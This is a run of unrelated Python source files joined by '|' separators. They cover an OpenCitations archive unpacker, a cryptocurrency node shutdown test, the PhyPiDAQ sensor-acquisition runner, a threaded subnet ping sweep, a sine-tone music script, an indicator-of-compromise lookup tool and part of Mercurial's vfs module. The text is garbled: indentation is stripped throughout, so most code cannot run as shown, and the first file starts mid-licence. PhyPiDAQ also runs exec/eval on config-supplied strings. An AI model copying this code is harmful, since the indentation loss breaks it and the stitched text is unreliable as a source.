# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND
# FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT,
# OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE,
# DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS
# SOFTWARE.
# This script unpacks all the DAR files related to a monthly OpenCitations Corpus dump
# and recreates the Corpus file system
import argparse
import zipfile
import re
import os
import subprocess
import glob
from multiprocessing import Process, Pool
from time import sleep
def unpack(zip_file, out_d=None):
if out_d is None:
out_dir = os.path.dirname(zip_file)
else:
out_dir = out_d
zip_file_basename = os.path.basename(zip_file)
print("[File '%s'] Start processing" % zip_file_basename)
current_dir = re.sub("[0-9-]+corpus_([^_\.]+).*", "\\1", zip_file_basename)
dir_path = out_dir + os.sep + current_dir
if not os.path.exists(dir_path):
os.makedirs(dir_path)
print("[File '%s'] Directory '%s' created" % (zip_file_basename, dir_path))
f_null = open(os.devnull, 'w')
zip_ref = zipfile.ZipFile(zip_file, 'r')
zip_ref.extractall(dir_path)
zip_ref.close()
print("[File '%s'] File unzipped correctly" % zip_file_basename)
dar_name = zip_file_basename[:-4]
if subprocess.call(["dar", "-O", "-R", dir_path + os.sep, "-x", dir_path + os.sep + dar_name],
stdout=f_null, stderr=subprocess.STDOUT):
print("[File '%s'] DAR was not extracted due to issues" % zip_file_basename)
else:
print("[File '%s'] DAR was extracted correctly" % zip_file_basename)
for dar_file in glob.glob(dir_path + os.sep + dar_name + ".[0-9]*.dar"):
os.remove(dar_file)
print("[File '%s'] DAR files deleted" % zip_file_basename)
os.remove(zip_file)
print("[File '%s'] Original zip file deleted" % zip_file_basename)
if __name__ == "__main__":
arg_parser = argparse.ArgumentParser("unpack.py",
description="This script unpack all the DAR files related to a monthly "
"OpenCitations Corpus dump (stored in ZIP files) and "
"recreates the Corpus file system")
arg_parser.add_argument("-i", "--input", dest="input", required=True,
help="The directory containing all the ZIP files to unpack.")
arg_parser.add_argument("-o", "--output", dest="output",
help="The directory where to store the Corpus data. If no "
"directory is specified, the script use the one specified "
"as input.")
args = arg_parser.parse_args()
in_dir = args.input
out_dir = in_dir
if args.output is not None:
out_dir = args.output
# job_server = pp.Server()
#
# jobs = []
#
# for cur_file in [zip_file for zip_file in os.listdir(in_dir) if zip_file.endswith(".zip")]:
# jobs += [job_server.submit(unpack, (in_dir + os.sep + cur_file, out_dir), modules=('re', 'os', 'zipfile', 'subprocess', 'glob'))]
#
# for job in jobs:
# job()
# procs = []
#
# for idx, cur_file in enumerate([zip_file for zip_file in os.listdir(in_dir) if zip_file.endswith(".zip")]):
# p = Process(target=unpack, args=(in_dir + os.sep + cur_file, out_dir))
# procs.append(p)
#
# for p in procs:
# p.start()
# sleep(5)
#
# for p in procs:
# p.join()
inputs = ()
for idx, cur_file in enumerate([zip_file for zip_file in os.listdir(in_dir) if zip_file.endswith(".zip")]):
inputs += (in_dir + os.sep + cur_file,)
    print(inputs)
p = Pool(len(inputs))
p.map_async(unpack, inputs)
p.close()
p.join()
print("DONE")
|
feature_shutdown.py
|
#!/usr/bin/env python3
# Copyright (c) 2018-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test flocoind shutdown."""
from test_framework.test_framework import FlocoinTestFramework
from test_framework.util import assert_equal, get_rpc_proxy
from threading import Thread
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(FlocoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
self.supports_cli = False
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
# Force connection establishment by executing a dummy command.
node.getblockcount()
Thread(target=test_long_call, args=(node,)).start()
# Wait until the server is executing the above `waitfornewblock`.
self.wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2)
# Wait 1 second after requesting shutdown but not before the `stop` call
# finishes. This is to ensure event loop waits for current connections
# to close.
self.stop_node(0, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
runPhyPiDAQ.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""run data acquisition
class collects data samples from various sensors, (re-)formats
and sends them to a display module, a file, a pipe or a websocket
Usage: ./runPhyPiDAQ.py [<PhyPiConf_file>.daq] [Interval]
"""
from __future__ import print_function, division, unicode_literals
from __future__ import absolute_import
# Package imports
import sys
import os
import time
import yaml
import numpy as np
import threading
import multiprocessing as mp
# math module needed for formulae
from math import *
# Display module
# only imported if needed: phypidaq.DisplayManager import DisplayManager
# Webserver
# module .WebsocketManager only imported if needed
# data recorder
from .DataRecorder import DataRecorder
# other helper functions
from .helpers import DAQwait
# modules imported only if needed
# from .helpers import generateCalibrationFunction
# from .helpers import RingBuffer
# ----- class for running data acquisition --------------------
class runPhyPiDAQ(object):
def __init__(self, verbose=1):
self.verbose = verbose
def prompt(self):
"""print status and prompt for command"""
class tc:
"""define terminal color codes"""
r = '\033[1;31;48m'
g = '\033[1;32;48m' # green color
b = '\033[1;34;48m'
k = '\033[1;30;48m'
y = '\033[1;33;48m' # yellow color
p = '\033[1;35;48m'
c = '\033[1;36;48m'
B = '\033[1;37;48m' # bold
U = '\033[4;37;48m' # underline
E = '\033[1;37;0m' # end color
# prompt for user input
prompt = ' type -> P(ause), R(esume), E(nd) or s(ave) + <ret> '
status = tc.b+tc.g+'Running'+tc.E if self.DAQ_ACTIVE else tc.b+tc.y+'Paused '+tc.E
        print('\r' + 5*' ' + status + 5*' ' + prompt, end='')
def keyboard_input(self, cmd_queue):
""" Read keyboard input, run as background-thread to avoid blocking """
first = True
while self.ACTIVE:
if first:
self.prompt()
first = False
cmd_queue.put(input())
def decodeCommand(self, cmdQ):
"""
evaluate keyboard commands
returns: 0 invalid command
1 status change
2 exit
"""
cmd = cmdQ.get()
rc = 0
if cmd == 'E':
if self.verbose > 1:
print('\n' + sys.argv[0] + ': End command received')
print('')
self.ACTIVE = False
rc = 2
elif cmd == 'P':
self.DAQ_ACTIVE = False
rc = 1
elif cmd == 'R':
self.DAQ_ACTIVE = True
rc = 1
elif cmd == 's':
self.DAQ_ACTIVE = False
if self.RBuf is not None:
print('\n storing data to file ', self.bufferFile, ' - now paused')
print(42 * ' ' + ' -> R(esume), E(nd) + <ret> ', end='', flush=True)
self.storeBufferData(self.bufferFile)
else:
print('\n buffer storage not active - no action')
rc = 1
self.prompt() # update status
return rc
def storeBufferData(self, fnam):
bufRec = DataRecorder(fnam, self.PhyPiConfDict)
for d in self.RBuf.read():
bufRec(d)
bufRec.close()
def setup(self):
"""
Set up data source(s), display module and options
interval: sampling interval
PhyPiConfDict: dictionary with config options
DEVs: list of instances of device classes
ChanIdx_ofDevice: index to store 1st channel of device i
NHWChannels number of active hardware channels
CalibFuncts: functions for calibration of raw channel readings
Formulae: list of formulae to apply to hardware channels
NFormulae: number of formulae
DatRec: instance of DataRecorder
"""
# check for / read command line arguments
if len(sys.argv) >= 3:
self.interval = float(sys.argv[2])
else:
self.interval = 0.5
# read PhyPiDAQ configuration file
if len(sys.argv) >= 2:
PhyPiConfFile = sys.argv[1]
else:
PhyPiConfFile = 'PhyPiConf.daq'
# read DAQ configuration file
if self.verbose:
print(' Configuration from file ' + PhyPiConfFile)
try:
with open(PhyPiConfFile) as f:
PhyPiConfDict = yaml.load(f, Loader=yaml.Loader)
except (OSError, yaml.YAMLError) as exception:
print('!!! failed to read configuration file ' + PhyPiConfFile)
print(str(exception))
exit(1)
# set default options:
if 'Interval' not in PhyPiConfDict:
PhyPiConfDict['Interval'] = self.interval
else:
self.interval = PhyPiConfDict['Interval']
if PhyPiConfDict['Interval'] < 0.05:
print(" !!! read-out intervals < 0.05 s not reliable, setting to 0.05 s")
PhyPiConfDict['Interval'] = 0.05
if 'NHistoryPoints' not in PhyPiConfDict: # length of stored history
PhyPiConfDict['NHistoryPoints'] = 120
if 'XYmode' not in PhyPiConfDict: # default is XY mode off
PhyPiConfDict['XYmode'] = False
if 'DataFile' not in PhyPiConfDict: # default is not to write output file
PhyPiConfDict['DataFile'] = None
if 'DisplayModule' not in PhyPiConfDict: # default display is DataLogger
PhyPiConfDict['DisplayModule'] = 'DataLogger'
if 'startActive' not in PhyPiConfDict: # default is to start in Paused mode
PhyPiConfDict['startActive'] = False
# read Device configuration(s) and instantiate device handler(s)
if 'DeviceFile' in PhyPiConfDict:
DevFiles = PhyPiConfDict['DeviceFile']
else:
DevFiles = 'ADS1115Config.yaml'
print("!!! no device config given - trying ADC ADS1115")
# if not a list, make it one
if not isinstance(DevFiles, list):
DevFiles = [DevFiles]
NDevices = len(DevFiles)
# open all device config files
DEVconfDicts = []
for fnam in DevFiles:
try:
f = open(fnam)
DEVconfDicts.append(yaml.load(f, Loader=yaml.Loader))
f.close()
except (OSError, yaml.YAMLError) as exception:
print('!!! failed to read configuration file ' + fnam)
print(str(exception))
exit(1)
# configure and initialize all Devices
DEVNames = [] # device names
NHWChannels = 0 # total number of hardware channels
ChanNams = [] # names of HW channels
ChanUnits = [] # Units of HW channels
ChanLims = [] # limits
ChanIdx_ofDevice = [] # first channel of each device
DEVs = []
for i in range(NDevices):
if 'DAQModule' in DEVconfDicts[i]:
DEVNames.append(DEVconfDicts[i]['DAQModule'])
else: # try to derive from name of Device Config File
                cdir, cfnam = os.path.split(DevFiles[i])
DEVNames.append(cfnam.split('.')[0])
if self.verbose:
print(' configuring device ' + DEVNames[i])
# import device class ...
exec('from .' + DEVNames[i] + ' import ' + DEVNames[i])
# ... and instantiate device handler
# exec('global DEVs; DEVs.append(' + DEVNames[i] + '(DEVconfDicts[i]) )' )
exec('DEVs.append(' + DEVNames[i] + '(DEVconfDicts[i]) )')
DEVs[i].init()
ChanIdx_ofDevice.append(NHWChannels)
nC = DEVs[i].NChannels
NHWChannels += nC
ChanNams += DEVs[i].ChanNams[0: nC]
ChanLims += DEVs[i].ChanLims[0: nC]
try:
ChanUnits += DEVs[i].ChanUnits[0: nC]
except (TypeError, AttributeError):
ChanUnits = None
self.DEVs = DEVs
self.ChanIdx_ofDevice = ChanIdx_ofDevice
self.ChanLims = ChanLims
self.ChanNams = ChanNams
self.ChanUnits = ChanUnits
self.NHWChannels = NHWChannels
# set up calibration Functions
CalibFuncts = None
if 'ChanCalib' in PhyPiConfDict:
from .helpers import generateCalibrationFunction
CalibFuncts = [None] * NHWChannels
calibData = PhyPiConfDict['ChanCalib']
if self.verbose > 1:
print(' Calibrating channels:')
for ic in range(NHWChannels):
print(' Chan ', ic, ' ', calibData[ic])
for ic in range(NHWChannels):
if calibData[ic] is not None:
CalibFuncts[ic] = generateCalibrationFunction(calibData[ic])
self.CalibFuncts = CalibFuncts
# Apply Formula(e) to calibrated channel reading(s)
Formulae = None
NFormulae = 0
if 'ChanFormula' in PhyPiConfDict:
Formulae = PhyPiConfDict['ChanFormula']
NFormulae = len(Formulae)
if self.verbose > 1:
print('applying formulae:')
for ifc in range(NFormulae):
if Formulae[ifc]:
print(' FChan ', ifc, ' ', Formulae[ifc])
self.Formulae = Formulae
self.NFormulae = NFormulae
# re-set number of Channels if Formulae are defined
nc = NFormulae if NFormulae else NHWChannels
PhyPiConfDict['NChannels'] = nc
# Add information for graphical display(s) to PhyPiConfDict
if 'ChanNams' not in PhyPiConfDict:
if NFormulae > NHWChannels:
self.ChanNams += (NFormulae - NHWChannels) * ['F']
else:
self.ChanNams = self.ChanNams[:nc]
for ifc in range(NFormulae):
if Formulae[ifc]:
self.ChanNams[ifc] = 'F' + str(ifc)
PhyPiConfDict['ChanNams'] = self.ChanNams
if 'ChanUnits' not in PhyPiConfDict:
if self.ChanUnits is not None:
PhyPiConfDict['ChanUnits'] = self.ChanUnits
else:
PhyPiConfDict['ChanUnits'] = [''] * nc
length = len(PhyPiConfDict['ChanUnits'])
if length < nc:
PhyPiConfDict['ChanUnits'] += (nc - length) * ['']
if 'ChanLabels' not in PhyPiConfDict:
PhyPiConfDict['ChanLabels'] = [''] * nc
else:
length = len(PhyPiConfDict['ChanLabels'])
if length < nc:
PhyPiConfDict['ChanLabels'] += (nc - length) * ['']
if 'ChanLimits' not in PhyPiConfDict:
if NFormulae > 0:
                print('PhyPiDAQ: formula(e) defined, but no ChanLimits supplied ')
print(' results may become unpredictable - exiting')
exit(1)
PhyPiConfDict['ChanLimits'] = ChanLims # take from hw devices if not set
# start data recording to disk if required
if PhyPiConfDict['DataFile'] is not None:
FName = PhyPiConfDict['DataFile']
self.DatRec = DataRecorder(FName, PhyPiConfDict)
if self.verbose:
print(' storing data to file ', FName)
else:
self.DatRec = None
PhyPiConfDict['DataFile'] = self.DatRec
# buffer the latest data (number of data points given by NHistoryPoints)
if 'bufferData' in PhyPiConfDict:
self.bufferFile = PhyPiConfDict['bufferData']
else:
self.bufferFile = "PhyPiData"
PhyPiConfDict['bufferData'] = self.bufferFile
# set-up a ring buffer
if self.bufferFile is not None:
from .helpers import RingBuffer
self.RBuf = RingBuffer(PhyPiConfDict['NHistoryPoints'])
else:
self.RBuf = None
# Configure a fifo for data output
if 'DAQfifo' in PhyPiConfDict:
self.DAQfifo = PhyPiConfDict['DAQfifo']
else:
self.DAQfifo = None
PhyPiConfDict['DAQfifo'] = self.DAQfifo
if self.DAQfifo:
print('PhyPiDAQ: opening fifo ', self.DAQfifo)
print(' start process reading from fifo')
from .helpers import FifoManager
self.send_to_fifo = FifoManager(self.DAQfifo)
# Configure a websocket for data transfer
if 'DAQwebsocket' in PhyPiConfDict:
self.DAQwebsocket = PhyPiConfDict['DAQwebsocket']
else:
self.DAQwebsocket = None
PhyPiConfDict['DAQwebsocket'] = self.DAQwebsocket
if self.DAQwebsocket:
from .WebsocketManager import WebsocketManager
print('PhyPiDAQ: opening websocket')
print(' start process reading websocket')
try:
self.send_to_websocket = WebsocketManager(interval=self.interval, config_dict=PhyPiConfDict)
except Exception as e:
print("!!! failed to set up websocket !!!")
print(e)
exit(1)
# LED indicators on GPIO pins
if 'RunLED' in PhyPiConfDict or 'ReadoutLED' in PhyPiConfDict:
from .pulseGPIO import pulseGPIO
if 'RunLED' in PhyPiConfDict:
self.RunLED = pulseGPIO(PhyPiConfDict['RunLED'])
else:
self.RunLED = None
if 'ReadoutLED' in PhyPiConfDict:
self.ReadoutLED = pulseGPIO(PhyPiConfDict['ReadoutLED'])
else:
self.ReadoutLED = None
# Print configuration
if self.verbose > 1:
print('\nPhyPiDAQ Configuration:')
print(yaml.dump(PhyPiConfDict))
self.PhyPiConfDict = PhyPiConfDict
def apply_calibs(self):
"""
apply calibration functions to hardware channels
input: Calibration Functions as calculated by
generateCalibrationFunctions() from interpolated
values in calibration table calibData[]
output: calibrated channel values
"""
for i in range(self.NHWChannels):
if self.CalibFuncts[i] is not None:
self.data[i] = self.CalibFuncts[i](self.data[i])
def apply_formulae(self):
"""
Calculate new quantities from hardware channels c0, c1, ...
replace entries in data by calculated quantities
input: - data from hardware channels
- list of formulae
data in hw channels c0, c1, ...
formula expressions are valid python expressions, where
all functions from math package can be used
output: calculated quantities by applying formula
f1(c0, c1 ...), f2(c0, c1, ...), ...
number of formulae may exceed number of hardware channels
"""
# copy data from hardware channels
# for ifc in range(self.NFormulae):
for ifc in range(self.NHWChannels):
exec('c' + str(ifc) + ' = self.data[' + str(ifc) + ']')
# apply formulae to signal data
for ifc in range(self.NFormulae):
if self.Formulae[ifc] is not None:
self.data[ifc] = eval(self.Formulae[ifc])
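    # Hedged configuration sketch (keys as used above, values are placeholders):
    # with two hardware channels c0 and c1, the DAQ config could define
    #
    #   ChanFormula:
    #     - c0 + c1
    #     - null            # keep channel 1 unchanged
    #
    # Each non-null entry is evaluated as a Python expression with the math
    # module in scope (see `from math import *` at the top of this file).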
def run(self):
"""
Run data acquisition as defined in configuration files
:return:
"""
if self.verbose:
print('*==* script ' + sys.argv[0] + ': data taking active \n')
        longInterval = 5.  # definition of a "long" readout interval
interval = self.PhyPiConfDict['Interval']
NChannels = self.PhyPiConfDict['NChannels']
DisplayModule = self.PhyPiConfDict['DisplayModule']
cmdQ = mp.Queue(1) # Queue for command input
datQ = mp.Queue(1) # Queue to spy on data transfer inside class Display
if 'startActive' not in self.PhyPiConfDict:
self.PhyPiConfDict['startActive'] = False # start in paused-mode
if 'DAQCntrl' not in self.PhyPiConfDict:
self.PhyPiConfDict['DAQCntrl'] = True # enable run control buttons
if DisplayModule is not None:
from .DisplayManager import DisplayManager
display_manager = DisplayManager(interval=None,
config_dict=self.PhyPiConfDict,
cmd_queue=cmdQ,
data_queue=datQ)
display_manager.init()
self.ACTIVE = True # background process(es) active
if self.PhyPiConfDict['startActive']:
self.DAQ_ACTIVE = True # Data Acquisition active
else:
# start in paused-mode
self.DAQ_ACTIVE = False # Data Acquisition inactive
print(' starting in Paused mode - type R to resume')
# start keyboard control
kbdthrd = threading.Thread(name='kbdInput', target=self.keyboard_input, args=(cmdQ,))
kbdthrd.daemon = True
kbdthrd.start()
# set up space for data
self.data = np.zeros(max(NChannels, self.NHWChannels))
tflash = min(0.2, interval / 2.) # pulse duration for readout LED
if self.RunLED:
self.RunLED.pulse(0) # switch on status LED
# -- LOOP
try:
cnt = 0
# T0 = time.time()
# brk = False
wait = DAQwait(interval) # initialize wait timer
while self.ACTIVE:
# regularly check for command input for long intervals
if interval > longInterval and self.DAQ_ACTIVE:
cmd = 0
while not datQ.empty(): # check for command input
if not cmdQ.empty():
cmd = self.decodeCommand(cmdQ)
if cmd:
break # got valid command
time.sleep(longInterval / 300.)
if cmd >= 2:
break # end command received
if self.DAQ_ACTIVE:
cnt += 1
# read data
for i, DEV in enumerate(self.DEVs):
DEV.acquireData(self.data[self.ChanIdx_ofDevice[i]:])
if self.ReadoutLED:
self.ReadoutLED.pulse(tflash) # pulse readout LED
# eventually calibrate raw readings
if self.CalibFuncts:
self.apply_calibs()
# eventually apply formula(e)
if self.Formulae:
self.apply_formulae()
# display data
if DisplayModule is not None:
display_manager.showData(self.data[:NChannels])
# store (latest) data in ring buffer as a list ...
if self.RBuf is not None:
self.RBuf.store(self.data[:NChannels].tolist())
# ... and record all data to disc ...
if self.DatRec:
self.DatRec(self.data[:NChannels])
if self.DAQfifo is not None or self.DAQwebsocket is not None:
# transform data to csv format
csv_data = ','.join(['{0:.3f}'.format(cnt * interval)] +
['{0:.4g}'.format(d) for d in self.data[:NChannels]])+'\n'
# ... write to fifo ...
if self.DAQfifo is not None:
self.send_to_fifo(csv_data)
# ... or send to websocket
if self.DAQwebsocket is not None:
self.send_to_websocket(csv_data)
# system time-corrected wait
wait()
else: # paused mode
time.sleep(min(interval / 10., 0.2))
# check for control input (from keyboard or display module)
if not cmdQ.empty():
self.decodeCommand(cmdQ)
# -- end while ACTIVE
except KeyboardInterrupt:
self.DAQ_ACTIVE = False
self.ACTIVE = False
print('\n' + sys.argv[0] + ': keyboard interrupt - closing down ...')
except BaseException:
# 'except Exception as e' leaves some errors unnoted
print('\n!!! ' + sys.argv[0] + ': exception in data-taking loop')
print(sys.exc_info()[1])
finally:
self.ACTIVE = False
print("\n*==* PhyPiDAQ Terminating ...")
if self.RunLED is not None:
self.RunLED.pulse(-1) # RunLED off
if self.DatRec:
self.DatRec.close()
if self.DAQfifo:
self.send_to_fifo('') # empty record to inform clients
self.send_to_fifo.close()
if self.DAQwebsocket:
self.send_to_websocket('\n') # empty record to inform clients
time.sleep(0.1)
self.send_to_websocket.close()
for DEV in self.DEVs:
DEV.closeDevice() # close down hardware device
if DisplayModule is not None:
display_manager.close()
if self.RunLED is not None:
self.RunLED.close()
if self.ReadoutLED is not None:
self.ReadoutLED.close()
time.sleep(1.)
if self.verbose:
print('\n*==* ' + sys.argv[0] + ': normal end - type <ret>')
sys.exit()
# execute only if called directly, but not when imported
if __name__ == "__main__": # - - - - - - - - - - - - - - - - - - - - - -
from .helpers import keyboard_wait
if len(sys.argv) != 2:
print("\n!!! run_phypi.py usage:\n" + 10 * ' ' + "run_phypi.py <config>.daq\n")
prompt = " starting demo mode from configuration PhyPiDemo.daq" \
+ "\n" + 25 * ' ' + "type <ret> to continue, 'E+<ret>' to exit -> "
answer = keyboard_wait(prompt)
if answer == '':
sys.argv.append("PhyPiDemo.daq")
else:
print(" exiting")
sys.exit(1)
daq = runPhyPiDAQ(verbose=1)
# 0: only errors are printed
# 1: normal output
# 2: verbose output
daq.setup()
print("DAQ set-up:\n", yaml.dump(daq.PhyPiConfDict))
daq.run()
|
mtping.py
|
import subprocess
import threading
def ping(host):
rc = subprocess.call(
        'ping -c2 %s > /dev/null 2>&1' % host,
shell=True
)
if rc == 0:
print('\033[32;1m%s:up\033[0m' % host)
else:
print('\033[31;1m%s:down\033[0m' % host)
if __name__ == '__main__':
ips = ['172.40.58.%s' % i for i in range(1, 255)]
for ip in ips:
t = threading.Thread(target=ping, args=(ip,))
t.start() # target(ip) -> ping(ip)
|
two_part.py
|
import random
import pyaudio
from clear_osc import SineOsc
import multiprocessing as mp
import time
sine_osc = SineOsc()
p = pyaudio.PyAudio()
stream = p.open(format=pyaudio.paFloat32,
channels=1,
rate=44100,
output=1,
)
x = 145
freqs = [
x,
x * 9/8,
x * 4/3,
x * 5/4,
x * 3/2,
x * 11/8,
x * 3/2,
x * 15/18,
x * 5/1.5,
x * 4/6,
x * 9/4,
x * 5/4,
x * 4/1.5,
x * 6/2,
x * 15/4,
x * 6/2,
x * 4,
x * 3/2,
x * 3/2,
x * 4/3,
x * 5/4,
x * 3/2,
x * 4/3,
x * 5/4,
#
x * 9/8,
x * 3/2,
x * 3/2,
x * 4/3,
x * 11/8,
x * 10/4,
x * 10/4,
x * 9/4,
x * 7/4,
x * 3/2,
x * 3/2,
x * 5/3,
x * 11/8,
0,
x * 12/5,
x * 12/5,
x * 3/2,
x * 3/2,
x * 4/3,
x * 13/8,
x * 13/8,
x * 5/2,
x * 7/2,
x * 9/2,
x * 10/3,
]
freqs2 = [
x * 11/8,
x * 11/8,
0,
x * 12/5,
x * 12/5,
x * 3/2,
x * 3/2,
x * 4/3,
x * 13/8,
x * 13/8,
x * 5/2,
x * 7/2,
x * 9/2,
x * 10/3,
]
timesThroughBach = 2
length = 60
def func1():
print ('func1')
for i in range(timesThroughBach):
for freq in freqs:
sine_osc.play_frequencies(stream, .25, 1, 8000, 1000,
freq,
freq * 2,
freq + 2,
)
if i == timesThroughBach - 1:
time.sleep(.25)
time.sleep(1.9)
for i in range(length):
for freq in freqs2:
sine_osc.play_frequencies(stream, .25, 1, 8000, 1000,
freq,
freq * 2,
freq + 2,
)
def func2():
print ('func2')
for i in range(timesThroughBach):
for freq in freqs:
sine_osc.play_frequencies(stream, .25, 1, 1000, 10000,
freq * 3/2,
freq * 3/2 * 2,
freq * 3/2,
freq / 2,
)
time.sleep(1.9)
for i in range(length):
for freq in freqs2:
sine_osc.play_frequencies(stream, .25, 1, 1000, 10000,
freq * 3/2,
freq * 3/2 * 2,
freq * 3/2,
freq / 2,
)
if __name__=='__main__':
mp.set_start_method('spawn')
p1 = mp.Process(target=func1)
p1.start()
time.sleep(2)
p2 = mp.Process(target=func2)
p2.start()
# time.sleep(4)
# p3 = mp.Process(target=func3)
# p3.start()
# I will pass you multiple series of notes and you will prepare to play them.
# When they are all ready, you will combine them and produce a single audio file.
# Phrases do not need to start at the same time.
# Phrases do not need to have any shared metrics.
# Rhythmic interaction will be described using mathematical relationships.
# Perhaps I can put a flag in one phrase that signals when a second phrase will start
# I can wait to start a phrase.
# I can put space in a phrase.
|
processing.py
|
#!/usr/bin/env python3
import model
import threading
from IPy import IP
import webbrowser as WB
from selenium import webdriver
class sanity():
def __init__(self, IoC):
self.types = ["d_", "u_", "i_"]
self.IoC = IoC
def check(self):
if self.__isIP__():
return self.types[2] # i_*
elif self.__isURL__():
return self.types[1] # u_*
else:
return self.types[0] # d_*
def __isIP__(self):
try:
IP(self.IoC)
except ValueError:
return False
return True
def __isURL__(self):
URL = ["%", "?", "=", "/", ":"]
for item in URL:
if item in self.IoC:
return True
return False
class worker():
def __init__(self, IoC, WORKING_SET, WORKING_OPT, user_choice):
self.BrowserDict = {
0:'mozilla', 1:'firefox', 2:'netscape', 3:'galeon', 4:'epiphany',
5:'skipstone', 6:'kfmclient', 7:'konqueror', 8:'kfm', 9:'mosaic',
10:'opera', 11:'grail', 12:'links', 13:'elinks', 14:'lynx',
15:'w3m', 16:'windows-default', 17:'macosx', 18:'safari', 19:'google-chrome',
20:'chrome', 21:'chromium', 22:'chromium-browser'
}
self.SeleniumDict = {
0:'Chrome', 1:'Edge', 2:'Firefox', 3:'Ie', 4:'Opera', 5:'Safari'
}
self.IoC = IoC
self.IoC_type = sanity(self.IoC).check()
self.WORKING_SET = []
self.WORKING_OPT = {}
self.user_choice = user_choice
for item in WORKING_SET:
self.WORKING_SET.append(item)
for key, val in WORKING_OPT.items():
self.WORKING_OPT[key] = val
self.scope(WORKING_SET, WORKING_OPT)
def scope(self, WORKING_SET, WORKING_OPT):
jobs_list = []
for key, value in self.BrowserDict.items():
WB.register(value, None, WB.BackgroundBrowser(self.WORKING_OPT[value+'_path']),key)
BR = WB.get(self.BrowserDict[int(self.WORKING_OPT['browser'])])
SE = getattr(webdriver, self.SeleniumDict[int(self.WORKING_OPT['selenium'])])
for WS in self.WORKING_SET:
if WS[0].startswith(self.IoC_type):
if int(WS[1]) == int(3) or int(WS[1]) == int(self.user_choice):
thread = threading.Thread(target=self.worker, args=(WS[0], BR, SE))
                    thread.daemon = True
jobs_list.append(thread)
for j in jobs_list:
j.start()
def worker(self, name, BR, SE):
Methods = model.methods(self.WORKING_SET, self.WORKING_OPT, BR, SE)
trigger = getattr(Methods, name)
trigger(IoC=self.IoC) # this is the call
|
vfs.py
|
# vfs.py - Mercurial 'vfs' classes
#
# Copyright Matt Mackall <mpm@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
from __future__ import absolute_import
import contextlib
import errno
import os
import shutil
import stat
import threading
from .i18n import _
from . import (
encoding,
error,
pathutil,
pycompat,
util,
)
def _avoidambig(path, oldstat):
"""Avoid file stat ambiguity forcibly
This function causes copying ``path`` file, if it is owned by
another (see issue5418 and issue5584 for detail).
"""
def checkandavoid():
newstat = util.filestat.frompath(path)
# return whether file stat ambiguity is (already) avoided
return (not newstat.isambig(oldstat) or
newstat.avoidambig(path, oldstat))
if not checkandavoid():
# simply copy to change owner of path to get privilege to
# advance mtime (see issue5418)
util.rename(util.mktempcopy(path), path)
checkandavoid()
class abstractvfs(object):
"""Abstract base class; cannot be instantiated"""
def __init__(self, *args, **kwargs):
'''Prevent instantiation; don't call this from subclasses.'''
raise NotImplementedError('attempted instantiating ' + str(type(self)))
def tryread(self, path):
'''gracefully return an empty string for missing files'''
try:
return self.read(path)
except IOError as inst:
if inst.errno != errno.ENOENT:
raise
return ""
def tryreadlines(self, path, mode='rb'):
'''gracefully return an empty array for missing files'''
try:
return self.readlines(path, mode=mode)
except IOError as inst:
if inst.errno != errno.ENOENT:
raise
return []
@util.propertycache
def open(self):
'''Open ``path`` file, which is relative to vfs root.
Newly created directories are marked as "not to be indexed by
the content indexing service", if ``notindexed`` is specified
for "write" mode access.
'''
return self.__call__
def read(self, path):
with self(path, 'rb') as fp:
return fp.read()
def readlines(self, path, mode='rb'):
with self(path, mode=mode) as fp:
return fp.readlines()
def write(self, path, data, backgroundclose=False, **kwargs):
with self(path, 'wb', backgroundclose=backgroundclose, **kwargs) as fp:
return fp.write(data)
def writelines(self, path, data, mode='wb', notindexed=False):
with self(path, mode=mode, notindexed=notindexed) as fp:
return fp.writelines(data)
def append(self, path, data):
with self(path, 'ab') as fp:
return fp.write(data)
def basename(self, path):
"""return base element of a path (as os.path.basename would do)
This exists to allow handling of strange encoding if needed."""
return os.path.basename(path)
def chmod(self, path, mode):
return os.chmod(self.join(path), mode)
def dirname(self, path):
"""return dirname element of a path (as os.path.dirname would do)
This exists to allow handling of strange encoding if needed."""
return os.path.dirname(path)
def exists(self, path=None):
return os.path.exists(self.join(path))
def fstat(self, fp):
return util.fstat(fp)
def isdir(self, path=None):
return os.path.isdir(self.join(path))
def isfile(self, path=None):
return os.path.isfile(self.join(path))
def islink(self, path=None):
return os.path.islink(self.join(path))
def isfileorlink(self, path=None):
'''return whether path is a regular file or a symlink
Unlike isfile, this doesn't follow symlinks.'''
try:
st = self.lstat(path)
except OSError:
return False
mode = st.st_mode
return stat.S_ISREG(mode) or stat.S_ISLNK(mode)
def reljoin(self, *paths):
"""join various elements of a path together (as os.path.join would do)
The vfs base is not injected so that path stay relative. This exists
to allow handling of strange encoding if needed."""
return os.path.join(*paths)
def split(self, path):
"""split top-most element of a path (as os.path.split would do)
This exists to allow handling of strange encoding if needed."""
return os.path.split(path)
def lexists(self, path=None):
return os.path.lexists(self.join(path))
def lstat(self, path=None):
return os.lstat(self.join(path))
def listdir(self, path=None):
return os.listdir(self.join(path))
def makedir(self, path=None, notindexed=True):
return util.makedir(self.join(path), notindexed)
def makedirs(self, path=None, mode=None):
return util.makedirs(self.join(path), mode)
def makelock(self, info, path):
return util.makelock(info, self.join(path))
def mkdir(self, path=None):
return os.mkdir(self.join(path))
def mkstemp(self, suffix='', prefix='tmp', dir=None):
fd, name = pycompat.mkstemp(suffix=suffix, prefix=prefix,
dir=self.join(dir))
dname, fname = util.split(name)
if dir:
return fd, os.path.join(dir, fname)
else:
return fd, fname
